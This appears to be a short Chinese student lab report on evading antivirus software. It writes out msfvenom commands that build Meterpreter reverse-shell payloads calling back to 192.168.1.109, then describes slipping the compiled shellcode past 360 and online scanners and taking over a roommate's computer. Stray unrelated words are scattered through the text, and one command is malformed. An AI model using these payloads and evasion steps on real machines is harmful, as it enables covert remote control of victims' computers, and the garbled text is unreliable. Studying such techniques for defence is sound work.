msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.1.109 lport=5213 x> 5213_backjar.jar
本身利用shellcode編程等免殺工具或技巧java
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=443 -f c
在本身的codeblocks上編譯運行,360出現了警告,將其添加到信任中便可
python
放到網上測試以後的結果只有百分之二十的識別出來了:
shell
運行結果再次成功:
編程
360木馬查殺結果:
windows
本機用的是奇虎360安全衛士,上圖能夠看得出來,這個任務我是在室友的電腦上作的,它用的是安全管家:
安全
下圖是掃描的結果:
tcp
在同連寢室網的環境下,攻擊成功:
工具
(1)殺軟是如何檢測出惡意代碼的?測試
* 分析惡意程序的行爲特徵,分析其代碼流將其性質歸類於惡意代碼
(2)免殺是作什麼?編碼
* 使惡意代碼避免被查殺,也就是要掩蓋惡意代碼的特徵
(3)免殺的基本方法有哪些?
* 免殺大概能夠分爲兩種狀況: 1. 二進制的免殺(無源碼),只能經過經過修改asm代碼/二進制數據/其餘數據來完成免殺。 2. 有源碼的免殺,能夠經過修改源代碼來完成免殺,也能夠結合二進制免殺的技術。 * 免殺也能夠分爲這兩種狀況: 1. 靜態文件免殺,被殺毒軟件病毒庫/雲查殺了,也就是文件特徵碼在病毒庫了。 2. 動態行爲免殺,運行中執行的某些行爲被殺毒軟件攔截報讀。
* 要想保證本身的計算機環境安全,不能簡單的徹底信任殺毒軟件,保不齊殺毒軟件謙虛了一下,計算機就可能中毒了。 * 離實戰還缺些什麼技術或步驟? * 將後門程序注入受害機,以及讓其如何自啓動。